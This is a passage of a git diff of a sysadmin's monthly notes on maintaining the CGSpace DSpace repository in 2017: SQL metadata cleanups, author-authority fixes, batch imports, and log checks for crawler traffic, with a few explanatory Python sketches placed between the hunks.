    -47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
    -/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
    -/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
    -'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
    -47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
    -531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
    -, '10947/2537', '10568/93761')));
    +AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/1
    +0', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '109
    +47/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947
    +/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947
    +/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521',
    +'10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '109
    +47/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2
    +531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535'
    +, '10947/2537', '10568/93761')));
     
    • To get a CSV (with counts) from that:
    dspace=# \copy (select distinct text_value, count(*)
     from metadatavalue
    -where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
    +where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author')
     AND resource_type_id = 2
    -AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
    +AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10947/2', '10947/3', '10947/10', '10947/4', '10947/5', '10947/6', '10947/7', '10947/8', '10947/9', '10947/11', '10947/25', '10947/12', '10947/26', '10947/27', '10947/28', '10947/29', '10947/30', '10947/13', '10947/14', '10947/15', '10947/16', '10947/31', '10947/32', '10947/33', '10947/34', '10947/35', '10947/36', '10947/37', '10947/17', '10947/18', '10947/38', '10947/19', '10947/39', '10947/40', '10947/41', '10947/42', '10947/43', '10947/2512', '10947/44', '10947/20', '10947/21', '10947/45', '10947/46', '10947/47', '10947/48', '10947/49', '10947/22', '10947/23', '10947/24', '10947/50', '10947/51', '10947/2518', '10947/2776', '10947/2790', '10947/2521', '10947/2522', '10947/2782', '10947/2525', '10947/2836', '10947/2524', '10947/2878', '10947/2520', '10947/2523', '10947/2786', '10947/2631', '10947/2589', '10947/2519', '10947/2708', '10947/2526', '10947/2871', '10947/2527', '10947/4467', '10947/3457', '10947/2528', '10947/2529', '10947/2533', '10947/2530', '10947/2531', '10947/2532', '10947/2538', '10947/2534', '10947/2540', '10947/2900', '10947/2539', '10947/2784', '10947/2536', '10947/2805', '10947/2541', '10947/2535', '10947/2537', '10568/93761'))) group by text_value order by count desc) to /tmp/cgiar-librar-authors.csv with csv;
     

    2017-05-23

    • Add Affiliation to filters on Listing and Reports module (#325)
    • @@ -343,21 +343,21 @@ COPY 111
    • Communicate with MARLO people about progress on exposing ORCIDs via the REST API, as it is set to be discussed in the June, 2017 DCAT meeting
    • Find all of Amos Omore’s author name variations so I can link them to his authority entry that has an ORCID:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Omore, A%';
     
    • Set the authority for all variations to one containing an ORCID:
    -
    dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
    +
    dspace=# update metadatavalue set authority='4428ee88-90ef-4107-b837-3c0ec988520b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Omore, A%';
     UPDATE 187
     
    • Next I need to do Edgar Twine:
    -
    dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
    +
    dspace=# select distinct text_value, authority, confidence from metadatavalue where metadata_field_id=3 and text_value like 'Twine, E%';
     
    • But it doesn’t look like any of his existing entries are linked to an authority which has an ORCID, so I edited the metadata via “Edit this Item” and looked up his ORCID and linked it there
    • Now I should be able to set his name variations to the new authority:
    -
    dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
    +
    dspace=# update metadatavalue set authority='f70d0a01-d562-45b8-bca3-9cf7f249bc8b', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Twine, E%';
     
    • Run the corrections on CGSpace and then update discovery / authority
    • I notice that there are a handful of java.lang.OutOfMemoryError: Java heap space errors in the Catalina logs on CGSpace, I should go look into that…
    • diff --git a/docs/2017-06/index.html b/docs/2017-06/index.html index 07dd02fd1..0c8128402 100644 --- a/docs/2017-06/index.html +++ b/docs/2017-06/index.html @@ -18,7 +18,7 @@ - + @@ -133,7 +133,7 @@
    • dc.format.extent: value.replace("p. ", "").split("-")[1].toNumber() - value.replace("p. ", "").split("-")[0].toNumber()
    -
  • Finally, after some filtering to see which small outliers there were (based on dc.format.extent using “p. 1-14” vs “29 p."), create a new column with last page number: +
  • Finally, after some filtering to see which small outliers there were (based on dc.format.extent using “p. 1-14” vs “29 p.”), create a new column with last page number:
    • cells["dc.page.from"].value.toNumber() + cells["dc.format.pages"].value.toNumber()
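The page arithmetic in these transforms is easy to get wrong, so here is a small Python sketch of the same logic. It assumes the extent looks like "p. 1-14"; the function names are hypothetical. Note that, like the GREL expression, it computes the difference between the two page numbers rather than an inclusive page count.

```python
def page_span(extent: str) -> int:
    """Return last page minus first page for an extent like "p. 1-14"."""
    first, last = extent.replace("p. ", "").split("-")
    return int(last) - int(first)


def last_page(page_from: int, pages: int) -> int:
    """Recover the last page number from the first page plus the span."""
    return page_from + pages


if __name__ == "__main__":
    span = page_span("p. 1-14")
    print(span, last_page(1, span))
```

Values in the other style ("29 p.") have no hyphen and would raise an error here, which is why they need to be filtered out first.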
    @@ -153,7 +153,7 @@
  • 17 of the items have issues with incorrect page number ranges, and upon closer inspection they do not appear in the referenced PDF
  • I’ve flagged them and proceeded without them (752 total) on DSpace Test:
  • -
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
    +
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
     
    • I went and did some basic sanity checks on the remaining items in the CIAT Book Chapters and decided they are mostly fine (except one duplicate and the flagged ones), so I imported them to DSpace Test too (162 items)
    • Total items in CIAT Book Chapters is 914, with the others being flagged for some reason, and we should send that back to CIAT
    • @@ -213,15 +213,15 @@
    • Finally import 914 CIAT Book Chapters to CGSpace in two batches:
    -
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
    -$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &> /tmp/ciat-books2.log
    +
    $ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &> /tmp/ciat-books.log
    +$ JAVA_OPTS="-Xmx1024m -Dfile.encoding=UTF-8" [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &> /tmp/ciat-books2.log
     

    2017-06-25

    • WLE has said that one of their Phase II research themes is being renamed from Regenerating Degraded Landscapes to Restoring Degraded Landscapes
    • Pull request with the changes to input-forms.xml: #329
    • As of now it doesn’t look like there are any items using this research theme so we don’t need to do any updates:
    -
    dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
    +
    dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
      text_value
     ------------
     (0 rows)
    diff --git a/docs/2017-07/index.html b/docs/2017-07/index.html
    index 17eaeec8f..7b7766730 100644
    --- a/docs/2017-07/index.html
    +++ b/docs/2017-07/index.html
    @@ -36,7 +36,7 @@ Merge changes for WLE Phase II theme rename (#329)
     Looking at extracting the metadata registries from ICARDA’s MEL DSpace database so we can compare fields with CGSpace
     We can use PostgreSQL’s extended output format (-x) plus sed to format the output into quasi XML:
     "/>
    -
    +
     
     
         
    @@ -132,7 +132,7 @@ We can use PostgreSQL’s extended output format (-x) plus sed to format the
     
  • Looking at extracting the metadata registries from ICARDA’s MEL DSpace database so we can compare fields with CGSpace
  • We can use PostgreSQL’s extended output format (-x) plus sed to format the output into quasi XML:
  • -
    $ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::'
    +
    $ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::'
     
    • The sed script is from a post on the PostgreSQL mailing list
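If the sed one-liner is too cryptic, roughly the same conversion can be sketched in Python. This is an assumption-laden illustration rather than a drop-in replacement: the function name is made up, it expects `psql -x` output where each record starts with a `-[ RECORD n ]` line followed by `key | value` lines, it escapes XML special characters (which the sed version does not), and it skips the continuation lines psql prints for multi-line values.

```python
import re
from xml.sax.saxutils import escape

RECORD_HEADER = re.compile(r"^-\[ RECORD \d+ \]")


def expanded_to_xml(text: str, schema: str = "cg") -> str:
    """Convert psql expanded (-x) output into quasi-XML <dc-type> blocks."""
    out = []
    open_record = False
    for line in text.splitlines():
        if RECORD_HEADER.match(line):
            if open_record:
                out.append("</dc-type>")  # close the previous record
            out.append("<dc-type>")
            out.append(f"  <schema>{escape(schema)}</schema>")
            open_record = True
        elif open_record and "|" in line:
            key, _, value = line.partition("|")
            key, value = key.strip(), value.strip()
            if not key:
                continue  # continuation of a multi-line value, ignored here
            out.append(f"  <{key}>{escape(value)}</{key}>")
    if open_record:
        out.append("</dc-type>")
    return "\n".join(out)


if __name__ == "__main__":
    sample = "\n".join([
        "-[ RECORD 1 ]----------",
        "element    | contributor",
        "qualifier  | author",
        "scope_note | ",
    ])
    print(expanded_to_xml(sample))
```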
    • Abenet says the ILRI board wants to be able to have “lead author” for every item, so I’ve whipped up a WIP test in the 5_x-lead-author branch
    • @@ -151,7 +151,7 @@ We can use PostgreSQL’s extended output format (-x) plus sed to format the
    • Adjust WLE Research Theme to include both Phase I and II on the submission form according to editor feedback (#330)
    • Generate list of fields in the current CGSpace cg scheme so we can record them properly in the metadata registry:
    -
    $ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::' > cg-types.xml
    +
    $ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:</dc-type>\n<dc-type>\n<schema>cg</schema>:;s:([^ ]*) +\| (.*):  <\1>\2</\1>:;s:^$:</dc-type>:;1s:</dc-type>\n::' > cg-types.xml
     
    • CGSpace was unavailable briefly, and I saw this error in the DSpace log file:
    @@ -211,7 +211,7 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
    • Move two top-level communities to be sub-communities of ILRI Projects
    -
    $ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child="$community"; done
    +
    $ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child="$community"; done
     
    • Discuss CGIAR Library data cleanup with Sisay and Abenet
    @@ -241,16 +241,16 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
    • Looks like the final list of metadata corrections for CCAFS project tags will be:
    -
    delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
    -update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
    -update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
    -delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
    +
    delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
    +update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
    +update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
    +delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
     
    • Now just waiting to run them on CGSpace, and then apply the modified input forms after Macaroni Bros give me an updated list
    • Temporarily increase the nginx upload limit to 200MB for Sisay to upload the CIAT presentations
    • Looking at the CGSpace activity page, there are 52 Baidu bots concurrently crawling our website (I copied the activity page to a text file and grepped it)!
    -
    $ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
    +
    $ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
     52
     
    • From looking at the dspace.log I see they are all using the same session, which means our Crawler Session Manager Valve is working
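The grep above treats the dots in `180.76.` as "any character" and matches anywhere on the line, so it could over-count in theory. A stricter version of the same count, sketched in Python, is below. It assumes (as the `awk '{print $5}'` does) that the client IP is the fifth whitespace-separated field of each line; the function name and sample lines are hypothetical.

```python
def count_unique_clients(lines, prefix="180.76.", column=4):
    """Count distinct values in one column that start with a literal prefix."""
    seen = set()
    for line in lines:
        fields = line.split()
        # column is zero-based, so 4 corresponds to awk's $5
        if len(fields) > column and fields[column].startswith(prefix):
            seen.add(fields[column])
    return len(seen)


if __name__ == "__main__":
    sample = [
        "a b c d 180.76.15.1 x",
        "a b c d 180.76.15.1 y",
        "a b c d 180.76.15.2 z",
        "a b c d 66.249.66.91 z",
    ]
    print(count_unique_clients(sample))
```

To run it against the saved activity page, pass an open file object (for example `open("/tmp/status")`) as `lines`.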
    • diff --git a/docs/2017-08/index.html b/docs/2017-08/index.html index 3f3cb4904..f3a873921 100644 --- a/docs/2017-08/index.html +++ b/docs/2017-08/index.html @@ -60,7 +60,7 @@ This was due to newline characters in the dc.description.abstract column, which I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet "/> - + @@ -215,7 +215,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
    • I need to get an author list from the database for only the CGIAR Library community to send to Peter
    • It turns out that I had already used this SQL query in May, 2017 to get the authors from CGIAR Library:
    -
    dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
    +
    dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
     
    • Meeting with Peter and CGSpace team
        @@ -242,7 +242,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
      • I sent a message to the mailing list about the duplicate content issue with /rest and /bitstream URLs
      • Looking at the logs for the REST API on /rest, it looks like someone is hammering it, perhaps doing testing or something…
      -
      # awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
      +
      # awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
           140 66.249.66.91
           404 66.249.66.90
          1479 50.116.102.77
      @@ -270,9 +270,9 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
       
      • There were only three deletions so I just did them manually:
      -
      dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
      +
      dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
       DELETE 1
      -dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
      +dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
       
      • Generate a new list of authors from the CGIAR Library community for Peter to look through now that the initial corrections have been done
      • Thinking about resource limits for PostgreSQL again after last week’s CGSpace crash and related to a recent discussion I had in the comments of the April, 2017 DCAT meeting notes
      • @@ -324,22 +324,22 @@ $ grep -rsI SQLException dspace-xmlui | wc -l
      • And actually, we can do it for other generic fields for items in those collections, for example dc.description.abstract:
      -
      dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
      +
      dspace=# update metadatavalue set text_lang='en_US' where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'description' and qualifier = 'abstract') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9')))
       
      • And on others like dc.language.iso, dc.relation.ispartofseries, dc.type, dc.title, etc…
      • Also, to move fields from dc.identifier.url to cg.identifier.url[en_US] (because we don’t use the Dublin Core one for some reason):
      -
      dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
      +
      dspace=# update metadatavalue set metadata_field_id = 219, text_lang = 'en_US' where resource_type_id = 2 AND metadata_field_id = 237;
       UPDATE 15
       
      • Set the text_lang of all dc.identifier.uri (Handle) fields to be NULL, just like default DSpace does:
      -
      dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
      +
      dspace=# update metadatavalue set text_lang=NULL where resource_type_id = 2 and metadata_field_id = 25 and text_value like 'http://hdl.handle.net/10947/%';
       UPDATE 4248
       
      • Also update the text_lang of dc.contributor.author fields for metadata in these collections:
      -
      dspace=# update metadatavalue set text_lang=NULL where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', 